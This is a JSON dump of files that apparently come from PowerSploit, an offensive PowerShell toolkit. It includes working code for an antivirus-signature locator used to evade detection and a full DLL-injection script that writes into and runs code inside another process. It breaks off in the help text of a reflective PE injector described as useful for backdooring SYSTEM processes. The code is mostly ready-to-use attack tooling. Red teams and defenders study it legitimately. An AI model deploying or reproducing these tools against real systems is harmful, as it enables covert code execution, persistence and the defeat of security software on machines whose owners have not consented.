[
  {
    "path": ".gitignore",
    "content": "#################\n## Eclipse\n#################\n\n*.pydevproject\n.project\n.metadata\nbin/\ntmp/\n*.tmp\n*.bak\n*.swp\n*~.nib\nlocal.properties\n.classpath\n.settings/\n.loadpath\n\n# External tool builders\n.externalToolBuilders/\n\n# Locally stored \"Eclipse launch configurations\"\n*.launch\n\n# CDT-specific\n.cproject\n\n# PDT-specific\n.buildpath\n\n\n#################\n## Visual Studio\n#################\n\n## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n\n# User-specific files\n*.suo\n*.user\n*.sln.docstates\n\n# Build results\n\n[Dd]ebug/\n[Rr]elease/\nbuild/\n[Bb]in/\n[Oo]bj/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n*_i.c\n*_p.c\n*.ilk\n*.meta\n*.obj\n*.pch\n*.pdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*.log\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.log\n*.scc\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opensdf\n*.sdf\n*.cachefile\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# NCrunch\n*.ncrunch*\n.*crunch*.local.xml\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.Publish.xml\n*.pubxml\n\n# NuGet Packages Directory\n## TODO: If you have NuGet Package Restore enabled, uncomment the next line\n#packages/\n\n# Windows Azure Build Output\ncsx\n*.build.csdef\n\n# Windows Store app package directory\nAppPackages/\n\n# Others\nsql/\n*.Cache\nClientBin/\n[Ss]tyle[Cc]op.*\n~$*\n*~\n*.dbmdl\n*.[Pp]ublish.xml\n*.pfx\n*.publishsettings\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file to a newer\n# Visual Studio version. Backup files are not needed, because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\n\n# SQL Server files\nApp_Data/*.mdf\nApp_Data/*.ldf\n\n#############\n## Windows detritus\n#############\n\n# Windows image file caches\nThumbs.db\nehthumbs.db\n\n# Folder config file\nDesktop.ini\n\n# Recycle Bin used on file shares\n$RECYCLE.BIN/\n\n# Mac crap\n.DS_Store\n\n\n#############\n## Python\n#############\n\n*.py[co]\n\n# Packages\n*.egg\n*.egg-info\ndist/\nbuild/\neggs/\nparts/\nvar/\nsdist/\ndevelop-eggs/\n.installed.cfg\n\n# Installer logs\npip-log.txt\n\n# Unit test / coverage reports\n.coverage\n.tox\n\n#Translations\n*.mo\n\n#Mr Developer\n.mr.developer.cfg\n"
  },
  {
    "path": "AntivirusBypass/AntivirusBypass.psd1",
    "content": "@{\r\n\r\n# Script module or binary module file associated with this manifest.\r\nModuleToProcess = 'AntivirusBypass.psm1'\r\n\r\n# Version number of this module.\r\nModuleVersion = '3.0.0.0'\r\n\r\n# ID used to uniquely identify this module\r\nGUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'\r\n\r\n# Author of this module\r\nAuthor = 'Matthew Graeber'\r\n\r\n# Copyright statement for this module\r\nCopyright = 'BSD 3-Clause'\r\n\r\n# Description of the functionality provided by this module\r\nDescription = 'PowerSploit Antivirus Avoidance/Bypass Module'\r\n\r\n# Minimum version of the Windows PowerShell engine required by this module\r\nPowerShellVersion = '2.0'\r\n\r\n# Functions to export from this module\r\nFunctionsToExport = '*'\r\n\r\n# List of all files packaged with this module\r\nFileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'\r\n\r\n}\r\n"
  },
  {
    "path": "AntivirusBypass/AntivirusBypass.psm1",
    "content": "Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}\n"
  },
  {
    "path": "AntivirusBypass/Find-AVSignature.ps1",
    "content": "function Find-AVSignature\n{\n<#\n.SYNOPSIS\n\nLocate tiny AV signatures.\n\nPowerSploit Function: Find-AVSignature  \nAuthors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nLocates single Byte AV signatures utilizing the same method as DSplit from \"class101\" on heapoverflow.com.\n\n.PARAMETER Startbyte\n\nSpecifies the first byte to begin splitting on.\n\n.PARAMETER Endbyte\n\nSpecifies the last byte to split on.\n\n.PARAMETER Interval\n\nSpecifies the interval size to split with.\n\n.PARAMETER Path\n\nSpecifies the path to the binary you want tested.\n\n.PARAMETER OutPath\n\nOptionally specifies the directory to write the binaries to.\n\n.PARAMETER BufferLen\n\nSpecifies the length of the file read buffer .  Defaults to 64KB.\n\n.PARAMETER Force\n\nForces the script to continue without confirmation.\n\n.EXAMPLE\n\nFind-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\\test\\exempt\\nc.exe\nFind-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run2 -Verbose\nFind-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run3 -Verbose\nFind-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run4 -Verbose\nFind-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run5 -Verbose\n\n.NOTES\n\nSeveral of the versions of \"DSplit.exe\" available on the internet contain malware.\n\n.LINK\n\nhttp://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html\nhttps://github.com/mattifestation/PowerSploit\nhttp://www.exploit-monday.com/\nhttp://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True)]\n        [ValidateRange(0,4294967295)]\n        [UInt32]\n        $StartByte,\n\n        [Parameter(Mandatory = $True)]\n        [String]\n        $EndByte,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateRange(0,4294967295)]\n        [UInt32]\n        $Interval,\n\n        [String]\n        [ValidateScript({Test-Path $_ })]\n        $Path = ($pwd.path),\n\n        [String]\n        $OutPath = ($pwd),\n\n        [ValidateRange(1,2097152)]\n        [UInt32]\n        $BufferLen = 65536,\n\n        [Switch] $Force\n    )\n\n    #test variables\n    if (!(Test-Path $Path)) {Throw \"File path not found\"}\n    $Response = $True\n    if (!(Test-Path $OutPath)) {\n        if ($Force -or ($Response = $psCmdlet.ShouldContinue(\"The `\"$OutPath`\" does not exist! Do you want to create the directory?\",\"\"))){new-item ($OutPath)-type directory}\n    }\n    if (!$Response) {Throw \"Output path not found\"}\n    if (!(Get-ChildItem $Path).Exists) {Throw \"File not found\"}\n    [Int32] $FileSize = (Get-ChildItem $Path).Length\n    if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw \"StartByte range must be between 0 and $Filesize\"}\n    [Int32] $MaximumByte = (($FileSize) - 1)\n    if ($EndByte -ceq \"max\") {$EndByte = $MaximumByte}\n\n    #Recast $Endbyte into an Integer so that it can be compared properly.\n    [Int32]$EndByte = $EndByte\n\n    #If $Endbyte is greater than the file Length, use $MaximumByte.\n    if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte}\n\n    #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte.\n    if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval}\n\n    Write-Verbose \"StartByte: $StartByte\"\n    Write-Verbose \"EndByte: $EndByte\"\n\n    #find the filename for the output name\n    [String] $FileName = (Split-Path $Path -leaf).Split('.')[0]\n\n    #Calculate the number of binaries\n    [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval)\n    if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)}\n\n    #Prompt user to verify parameters to avoid writing binaries to the wrong directory\n    $Response = $True\n    if ( $Force -or ( $Response = $psCmdlet.ShouldContinue(\"This script will result in $ResultNumber binaries being written to `\"$OutPath`\"!\",\n             \"Do you want to continue?\"))){}\n    if (!$Response) {Return}\n\n    Write-Verbose \"This script will now write $ResultNumber binaries to `\"$OutPath`\".\"\n    [Int32] $Number = [Math]::Floor($Endbyte/$Interval)\n\n    #Create a Read Buffer and Stream.\n    #Note: The Filestream class takes advantage of internal .NET Buffering.  We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc.\n    [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen\n    [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen)\n\n    #write out the calculated number of binaries\n    [Int32] $i = 0\n    for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++)\n    {\n        # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval\n        if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte}\n        else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))}\n\n        Write-Verbose \"Byte 0 -> $($SplitByte)\"\n\n        #Reset ReadStream to beginning of file\n        $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null\n\n        #Build a new FileStream for Writing\n        [String] $outfile = Join-Path $OutPath \"$($FileName)_$($SplitByte).bin\"\n        [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen)\n\n        [Int32] $BytesLeft = $SplitByte\n        Write-Verbose \"$($WriteStream.name)\"\n\n        #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer\n        while ($BytesLeft -gt $BufferLen){\n            [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen)\n            $WriteStream.Write($ReadBuffer, 0, $count)\n            $BytesLeft = $BytesLeft - $count\n        }\n\n        #Write the remaining bytes to the file\n        do {\n            [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft)\n            $WriteStream.Write($ReadBuffer, 0, $count)\n            $BytesLeft = $BytesLeft - $count\n        }\n        until ($BytesLeft -eq 0)\n        $WriteStream.Close()\n        $WriteStream.Dispose()\n    }\n    Write-Verbose \"Files written to disk. Flushing memory.\"\n    $ReadStream.Dispose()\n\n    #During testing using large binaries, memory usage was excessive so lets fix that\n    [System.GC]::Collect()\n    Write-Verbose \"Completed!\"\n}\n"
  },
  {
    "path": "AntivirusBypass/Usage.md",
    "content": "To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\r\n\r\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\r\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\r\n\r\nTo use the module, type `Import-Module AntivirusBypass`\r\n\r\nTo see the commands imported, type `Get-Command -Module AntivirusBypass`\r\n\r\nFor help on each individual command, Get-Help is your friend.\r\n\r\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability."
  },
  {
    "path": "CodeExecution/CodeExecution.psd1",
    "content": "@{\n\n# Script module or binary module file associated with this manifest.\nModuleToProcess = 'CodeExecution.psm1'\n\n# Version number of this module.\nModuleVersion = '3.0.0.0'\n\n# ID used to uniquely identify this module\nGUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'\n\n# Author of this module\nAuthor = 'Matthew Graeber'\n\n# Company or vendor of this module\nCompanyName = ''\n\n# Copyright statement for this module\nCopyright = 'BSD 3-Clause'\n\n# Description of the functionality provided by this module\nDescription = 'PowerSploit Code Execution Module'\n\n# Minimum version of the Windows PowerShell engine required by this module\nPowerShellVersion = '2.0'\n\n# Functions to export from this module\nFunctionsToExport = '*'\n\n# List of all files packaged with this module\nFileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', \n               'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'\n}\n"
  },
  {
    "path": "CodeExecution/CodeExecution.psm1",
    "content": "Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}\n"
  },
  {
    "path": "CodeExecution/Invoke-DllInjection.ps1",
    "content": "function Invoke-DllInjection\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nInjects a Dll into the process ID of your choosing.\r\n\r\nPowerSploit Function: Invoke-DllInjection  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nInvoke-DllInjection injects a Dll into an arbitrary process.\r\nIt does this by using VirtualAllocEx to allocate memory the size of the\r\nDLL in the remote process, writing the names of the DLL to load into the\r\nremote process spacing using WriteProcessMemory, and then using RtlCreateUserThread\r\nto invoke LoadLibraryA in the context of the remote process.\r\n\r\n.PARAMETER ProcessID\r\n\r\nProcess ID of the process you want to inject a Dll into.\r\n\r\n.PARAMETER Dll\r\n\r\nName of the dll to inject. This can be an absolute or relative path.\r\n\r\n.EXAMPLE\r\n\r\nInvoke-DllInjection -ProcessID 4274 -Dll evil.dll\r\n\r\nDescription\r\n-----------\r\nInject 'evil.dll' into process ID 4274.\r\n\r\n.NOTES\r\n\r\nUse the '-Verbose' option to print detailed information.\r\n\r\n.LINK\r\n\r\nhttp://www.exploit-monday.com\r\n#>\r\n\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\r\n    [CmdletBinding()]\r\n    Param (\r\n        [Parameter( Position = 0, Mandatory = $True )]\r\n        [Int]\r\n        $ProcessID,\r\n\r\n        [Parameter( Position = 1, Mandatory = $True )]\r\n        [String]\r\n        $Dll\r\n    )\r\n\r\n    # Confirm that the process you want to inject into exists\r\n    try\r\n    {\r\n        Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null\r\n    }\r\n    catch [System.Management.Automation.ActionPreferenceStopException]\r\n    {\r\n        Throw \"Process does not exist!\"\r\n    }\r\n\r\n    # Confirm that the path to the dll exists\r\n    try\r\n    {\r\n        $Dll = (Resolve-Path $Dll -ErrorAction Stop).Path\r\n        Write-Verbose \"Full path to Dll: $Dll\"\r\n        $AsciiEncoder = New-Object System.Text.ASCIIEncoding\r\n        # Save the name of the dll in an ascii-encoded format. This name will be injected into the remote process.\r\n        $DllByteArray = $AsciiEncoder.GetBytes($Dll)\r\n    }\r\n    catch [System.Management.Automation.ActionPreferenceStopException]\r\n    {\r\n        Throw \"Invalid Dll path!\"\r\n    }\r\n\r\n    function Local:Get-DelegateType\r\n    {\r\n        Param\r\n        (\r\n            [OutputType([Type])]\r\n\r\n            [Parameter( Position = 0)]\r\n            [Type[]]\r\n            $Parameters = (New-Object Type[](0)),\r\n\r\n            [Parameter( Position = 1 )]\r\n            [Type]\r\n            $ReturnType = [Void]\r\n        )\r\n\r\n        $Domain = [AppDomain]::CurrentDomain\r\n        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\r\n        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\r\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\r\n        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\r\n        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\r\n        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\r\n        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\r\n        $MethodBuilder.SetImplementationFlags('Runtime, Managed')\r\n\r\n        Write-Output $TypeBuilder.CreateType()\r\n    }\r\n\r\n    function Local:Get-ProcAddress\r\n    {\r\n        Param\r\n        (\r\n            [OutputType([IntPtr])]\r\n\r\n            [Parameter( Position = 0, Mandatory = $True )]\r\n            [String]\r\n            $Module,\r\n\r\n            [Parameter( Position = 1, Mandatory = $True )]\r\n            [String]\r\n            $Procedure\r\n        )\r\n\r\n        # Get a reference to System.dll in the GAC\r\n        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\r\n            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\r\n        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\r\n        # Get a reference to the GetModuleHandle and GetProcAddress methods\r\n        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\r\n        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\r\n        # Get a handle to the module specified\r\n        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\r\n        $tmpPtr = New-Object IntPtr\r\n        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\r\n\r\n        # Return the address of the function\r\n        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\r\n    }\r\n\r\n    function Local:Get-PEArchitecture\r\n    {\r\n        Param\r\n        (\r\n            [Parameter( Position = 0,\r\n                        Mandatory = $True )]\r\n            [String]\r\n            $Path\r\n        )\r\n\r\n        # Parse PE header to see if binary was compiled 32 or 64-bit\r\n        $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)\r\n\r\n        [Byte[]] $MZHeader = New-Object Byte[](2)\r\n        $FileStream.Read($MZHeader,0,2) | Out-Null\r\n\r\n        $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)\r\n        if ($Header -ne 'MZ')\r\n        {\r\n            $FileStream.Close()\r\n            Throw 'Invalid PE header.'\r\n        }\r\n\r\n        # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)\r\n        $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null\r\n\r\n        [Byte[]] $lfanew = New-Object Byte[](4)\r\n\r\n        # Read offset to the PE Header (will be read in reverse)\r\n        $FileStream.Read($lfanew,0,4) | Out-Null\r\n        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))\r\n\r\n        # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE\r\n        $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null\r\n        [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)\r\n\r\n        # Read compiled architecture\r\n        $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null\r\n        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')\r\n        $FileStream.Close()\r\n\r\n        if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))\r\n        {\r\n            Throw 'Invalid PE header or unsupported architecture.'\r\n        }\r\n\r\n        if ($Architecture -eq '014C')\r\n        {\r\n            Write-Output 'X86'\r\n        }\r\n        elseif ($Architecture -eq '8664')\r\n        {\r\n            Write-Output 'X64'\r\n        }\r\n        else\r\n        {\r\n            Write-Output 'OTHER'\r\n        }\r\n    }\r\n\r\n\r\n    # Get addresses of and declare delegates for essential Win32 functions.\r\n    $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\r\n    $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\r\n    $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\r\n    $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\r\n    $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr])\r\n    $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\r\n    $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx\r\n    $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32]) ([Bool])\r\n    $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)\r\n    $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\r\n    $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])\r\n    $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\r\n    $RtlCreateUserThreadAddr = Get-ProcAddress ntdll.dll RtlCreateUserThread\r\n    $RtlCreateUserThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32])\r\n    $RtlCreateUserThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RtlCreateUserThreadAddr, $RtlCreateUserThreadDelegate)\r\n    $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle\r\n    $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])\r\n    $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)\r\n\r\n    # Determine the bitness of the running PowerShell process based upon the size of the IntPtr type.\r\n    if ([IntPtr]::Size -eq 4)\r\n    {\r\n        $PowerShell32bit = $True\r\n    }\r\n    else\r\n    {\r\n        $PowerShell32bit = $False\r\n    }\r\n\r\n    if (${Env:ProgramFiles(x86)}) {\r\n        $64bitOS = $True\r\n    } else {\r\n        $64bitOS = $False\r\n    }\r\n\r\n    # The address for IsWow64Process will be returned if and only if running on a 64-bit CPU. Otherwise, Get-ProcAddress will return $null.\r\n    $IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process\r\n\r\n    if ($IsWow64ProcessAddr)\r\n    {\r\n    \t$IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\r\n    \t$IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\r\n    }\r\n\r\n    $Architecture = Get-PEArchitecture $Dll\r\n\r\n    Write-Verbose \"Architecture of the dll to be injected: $Architecture\"\r\n\r\n    # Open a handle to the process you want to inject into\r\n    $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)\r\n\r\n    if (!$hProcess)\r\n    {\r\n        Throw 'Unable to open process handle.'\r\n    }\r\n\r\n    if ($64bitOS) # Only perform theses checks if OS is 64-bit\r\n    {\r\n        if ( ($Architecture -ne 'X86') -and ($Architecture -ne 'X64') )\r\n        {\r\n            Throw 'Only x86 or AMD64 architechtures supported.'\r\n        }\r\n\r\n        # Determine is the process specified is 32 or 64 bit. Assume that it is 64-bit unless determined otherwise.\r\n        $IsWow64 = $False\r\n        $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null\r\n\r\n        if ( $PowerShell32bit -and ($Architecture -eq 'X64') )\r\n        {\r\n            Throw 'You cannot manipulate 64-bit code within 32-bit PowerShell. Open the 64-bit version and try again.'\r\n        }\r\n\r\n        if ( (!$IsWow64) -and ($Architecture -eq 'X86') )\r\n        {\r\n            Throw 'You cannot inject a 32-bit DLL into a 64-bit process.'\r\n        }\r\n\r\n        if ( $IsWow64 -and ($Architecture -eq 'X64') )\r\n        {\r\n            Throw 'You cannot inject a 64-bit DLL into a 32-bit process.'\r\n        }\r\n    }\r\n    else\r\n    {\r\n        if ($Architecture -ne 'X86')\r\n        {\r\n            Throw 'PE file was not compiled for x86.'\r\n        }\r\n    }\r\n\r\n    # Get address of LoadLibraryA function\r\n    $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\r\n    Write-Verbose \"LoadLibrary address: 0x$($LoadLibraryAddr.ToString(\"X$([IntPtr]::Size*2)\"))\"\r\n\r\n    # Reserve and commit memory to hold name of dll\r\n    $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Dll.Length, 0x3000, 4) # (0x3000 = Reserve|Commit, 4 = RW)\r\n    if ($RemoteMemAddr -eq [IntPtr]::Zero)\r\n    {\r\n        Throw 'Unable to allocate memory in remote process. Try running PowerShell elevated.'\r\n    }\r\n    Write-Verbose \"DLL path memory reserved at 0x$($RemoteMemAddr.ToString(\"X$([IntPtr]::Size*2)\"))\"\r\n\r\n    # Write the name of the dll to the remote process address space\r\n    $WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $DllByteArray, $Dll.Length, [Ref] 0) | Out-Null\r\n    Write-Verbose \"Dll path written sucessfully.\"\r\n\r\n    # Execute dll as a remote thread\r\n    $Result = $RtlCreateUserThread.Invoke($hProcess, [IntPtr]::Zero, $False, 0, [IntPtr]::Zero, [IntPtr]::Zero, $LoadLibraryAddr, $RemoteMemAddr, [IntPtr]::Zero, [IntPtr]::Zero)\r\n    if ($Result)\r\n    {\r\n        Throw \"Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))\"\r\n    }\r\n\r\n    $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)\r\n\r\n    # Close process handle\r\n    $CloseHandle.Invoke($hProcess) | Out-Null\r\n\r\n    Start-Sleep -Seconds 2\r\n\r\n    # Extract just the filename from the provided path to the dll.\r\n    $FileName = (Split-Path $Dll -Leaf).ToLower()\r\n    $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) }\r\n\r\n    if (!$DllInfo)\r\n    {\r\n        Throw \"Dll did dot inject properly into the victim process.\"\r\n    }\r\n\r\n    Write-Verbose 'Dll injection complete!'\r\n\r\n    $DllInfo\r\n}\r\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection.ps1",
    "content": "function Invoke-ReflectivePEInjection\n{\n<#\n.SYNOPSIS\n\nThis script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,\nor it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,\nplease lead the Notes section (GENERAL NOTES) for information on how to use them.\n\n1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.\nBecause the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.\n\nThis tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,\nthis will load and execute the DLL/EXE in to memory without writing any files to disk.\n\n2.) Reflectively load a DLL in to memory of a remote process.\nAs mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.\n\nThis is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output\nfrom the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the\nremote process.\n\nPowerSploit Function: Invoke-ReflectivePEInjection  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nCode review and modifications: Matt Graeber, Twitter: @mattifestation  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nReflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.\n\n.PARAMETER PEBytes\n\nA byte array containing a DLL/EXE to load and execute.\n\n.PARAMETER ComputerName\n\nOptional, an array of computernames to run the script on.\n\n.PARAMETER FuncReturnType\n\nOptional, the return type of the function being called in the DLL. Default: Void\n    Options: String, WString, Void. See notes for more information.\n    IMPORTANT: For DLLs being loaded remotely, only Void is supported.\n\n.PARAMETER ExeArgs\n\nOptional, arguments to pass to the executable being reflectively loaded.\n\n.PARAMETER ProcName\n\nOptional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.\n\n.PARAMETER ProcId\n\nOptional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.\n\n.PARAMETER ForceASLR\n\nOptional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even\n    if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when\n    loading in to a remote process.\n\n.PARAMETER 